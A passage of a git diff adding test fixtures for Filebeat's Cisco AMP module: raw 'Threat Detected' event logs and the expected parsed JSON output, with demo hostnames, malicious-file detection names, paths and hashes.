Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json new file mode 100644 index 000000000000..1722799bd5e3 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json @@ -0,0 +1,2828 @@ +[ + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196256", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 1317, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196254", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 365000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 2642, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196253", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 350000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 3967, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 5292, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 6617, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 7942, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 303000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 9267, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196248", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 287000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 10592, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 256000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11917, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196246", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 13242, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196245", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": 